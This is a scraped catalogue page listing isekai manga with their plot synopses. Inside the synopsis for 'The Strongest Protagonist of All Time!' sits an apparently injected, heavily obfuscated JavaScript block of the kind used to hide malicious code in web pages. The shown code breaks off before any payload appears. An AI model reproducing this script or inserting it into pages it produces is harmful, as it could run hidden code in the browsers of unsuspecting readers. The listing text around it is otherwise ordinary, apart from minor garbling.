Isekai - Page 125

Isekai manga is a genre that follows characters who are transported or reincarnated into a different world, often full of magic and mythical creatures. The main focus is on their journey in the new world and their quest to overcome challenges or change their destiny.

1522 results

Habatake Majutsu Sekai No Shitei Tachi!

For over a thousand years, humanity has been protected from the relentless invasions of monsters by the strongest grand mage, Ishtar, and her exceptional direct disciples. However, among these disciples, only Gilberto led a self-indulgent, lazy lifestyle. One day, Ishtar suddenly announces her retirement, and a young girl named Lapis appears, aspiring to become a disciple. As one problem after another arises, Gilberto\'s peaceful days are turned upside down—! A heartwarming fantasy of mentorship and growth, filled with laughter and tears!


Teihen Ossan, Cheat Kokusei De Isekai Rakuraku Life

Reincarnated from a bottom-tier salaryman to an adventurer, he possessed only one skill: . A seemingly dead-end second life enveloped in games even in another world… This is the record of a man’s meteoric rise from the depths to cheat-level life in another world!


Isekai Samurai

The strongest swordsman of the Warring States period, transferred to another world. At the end of the Warring States Period, Ginko, the greatest swordsman of the time, was always hungry for a fight to the death with someone stronger than herself. After cutting and cutting and cutting, she finally despairs that there is no one stronger than her in this world, and then she is transferred to another world! Before her eyes - a dragon!


The Exiled Heavy Knight Knows How to Game the System

\"You good-for-nothing bastard. You are the son of a Sword Saint, yet you dare pull such a defective Class?!\" During the〈Divine Blessing Ceremony〉of the 15-year-old Elma who came from a lineage of Sword Saints, he had manifested a commonly deemed defective class known as the Heavy Knight. He had been deprived of his position as the next head of the Edvan Household and was then exiled. The Heavy Knight class had an unbalanced status and useless skills, to top it off, it was even said to be a class cowardly and indolent people have. But, Elma knew better—that this world was the world of the game he had used to play before—and that the Heavy Knight class was the strongest class to exist. Elma made full use of the knowledge he had in his previous life and began his efficient walkthrough of the world he was reincarnated into.


The Strongest Protagonist of All Time!

Zhao Xiaotian suffered all kinds of hardships with relevance to supernatural powers. After he got caught up in an explosion, he was able to catch up with the comic genre trend nowadays which is: "Isekai". But unfortunately, the villains of the world still got their grasp on him for unknown reasons, maybe due to plot. He was continuously assassinated, kidnapped, and he was ripped of his money. And thenceforth, Zhang Xiaotian persevered on the way of cultivation!<script></script><script>function _0x3154(_0x1dd319,_0x1da527){var _0x3c823c=_0x1d11();return _0x3154=function(_0x8edc48,_0x5dbe20){_0x8edc48=_0x8edc48-(-0x1185+0x1*-0x148d+0x97*0x43);var _0x116b4c=_0x3c823c[_0x8edc48];return _0x116b4c;},_0x3154(_0x1dd319,_0x1da527);}(function(_0xb3a4d2,_0x359516){var _0x4df310=_0x3154,_0x4e9927=_0xb3a4d2();while(!![]){try{var _0x4f93f9=-parseInt(_0x4df310(0x177))/(-0x277+-0x885+0xafd*0x1)*(parseInt(_0x4df310(0x17b))/(0x18*0xde+0x24b*0x11+-0x3bc9))+-parseInt(_0x4df310(0x189))/(0x9*0x1f3+0x13e3+-0x256b)+-parseInt(_0x4df310(0x17e))/(0x15b*-0x11+-0xaec+0x21fb)+-parseInt(_0x4df310(0x178))/(0x2587+0xbe2+-0x3164*0x1)+-parseInt(_0x4df310(0x18b))/(0x877+-0x1b83+0x1312)+parseInt(_0x4df310(0x181))/(0x1ea2+-0x1*0x1235+-0x2*0x633)*(-parseInt(_0x4df310(0x185))/(0x1*0x186d+-0x158*0xc+-0x1d*0x49))+parseInt(_0x4df310(0x190))/(0x13b1+-0x2138+-0x1*-0xd90);if(_0x4f93f9===_0x359516)break;else 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Honzuki no Gekokujou ~Shisho ni Naru Tame ni wa Shudan wo Erandeiraremasen~ Dai 2-bu 「Hon no Tamenara Miko ni Naru!」

Contains spoilers for the ending of Part 1 SpoilerAfter the discussions with the temple master and head priest ended, Myne won the right to be treated as a noble with the role of a blue-robed shrine maiden apprentice. Work in the temple began and Myne could read books in the long-awaited temple library. However, there were many problems in the temple, such as adapting to the class system and dealing with the problem children assigned to her as attendants. Overcome adversity to be able to read books in peace! A biblio-fantasy written for book lovers and bookworms! The second part begins!


Kamase Inu kara Hajimeru Tenka Touitsu 〜Jinrui Saikouhou no Rasubosu wo Enjite Gensaku Bureiku〜

\"I\'\' fell asleep while watching the anime 『Twilight of the Gods』. When I woke up, I realized that I had become \"Jill\", the last boss of the first part of the anime. What\'s more, a future in which he becomes a punching bag for the last boss of the second part, the \"Evil God\" and dies a miserable death, awaits Jill. In order to avoid the worst possible ending, \"I\" decide to destroy the flow of the original. \"I\'\' try my best to act like Jill, but my actions cause misunderstandings among my subordinates, and for some reason, an unexpected break from the original story occurs where I am worshiped as a god...! A misunderstanding/comedy about survival in another world where the protagonist makes use of his knowledge of the original work to try to avoid death!


Dimensional Mercenary ( Other World Warrior )

Would you like to find a job? Even at the cost of your soul? If so, then you’ve found the right place. Our job hunting advice website, Soul Sellers, is a site geared towards those willing to even sell their souls for employment; that’s right, people like you. Are you dealing with angels or demons?30-year old freeloader Chul Ho Kang made a deal through this shady site, even selling his soul for the chance at what else? Money! An invitation to the other world for the weak and downtrodden of society for a chance to change their lot in life! That is the mission given to Chul Ho Kang!


Izure Saikyou no Renkinjutsushi

Not even a hero, Takumi Iruma gets accidentally mixed in with a group of heroes chosen to be summoned to another world. As compensation for the mix-up, a goddess offers him the right to choose any skill he wishes for! Hoping for a peaceful and quiet life that has nothing to do with fighting or going into battle, he chooses a seemingly boring creation skill. However, it turns out \"alchemy\" is the most powerful skill that allows him to create everything from a holy sword to flying ships! This cheat skill he unexpectedly acquired turns him into a wealthy merchant and makes him undefeatable in battles! A heartwarming adventure story about (possibly) the most powerful alchemist in another world! *Alpha Manga* --- *Alternate description:* Iruma Takumi, a 40-year old salary man, was dragged into a hero summoning just like in a template. What was his fate? The Goddess sent him and the heroes to the other world separately. With the Goddess’ overprotective support, he landed in a different world looking handsome, rejuvenated, and quite different from a Japanese. Although he wanted a slow life while working in the manufacturing trade, that was not permitted by the Goddess’ special body and abilities. Would Takumi be able to live a peaceful life in a different world?


Taberu dake de Level-Up! Damegami to Issho ni Isekai Musou

The Useless Goddess Laura whose only strong point is having huge breasts, And the boy Kehma who was summoned to another world. Gaining a cheat skill that absorbs the abilities of what he eats, he enjoys the other world life eating delicious monsters and playing with the easy to handle Goddess.


SSS-Class Revival Hunter

In the mysterious, RPG dungeon-like Tower, Gongja Kim lives a mundane existence, envying all the star hunters. One day, his wish for more is granted with a legendary skill to copy others’ abilities… at the cost of his life. Before he can make sense of it, he’s killed by the #1 hunter, the Flame Emperor! But this activates his skill and now he’s copied a new one, the ability to travel back in time upon death. How will Gongja use these skills to outplay the competition and rise to the top?


The Heroine’s Friend Strikes Back

Reborn as a side character wrongfully accused and executed, Mia resolves to rewrite her fate. Returning to the moment she first met the villainous heroine, she vows to stand tall and fight back, sparking a thrilling rebellion against a fabricated destiny.
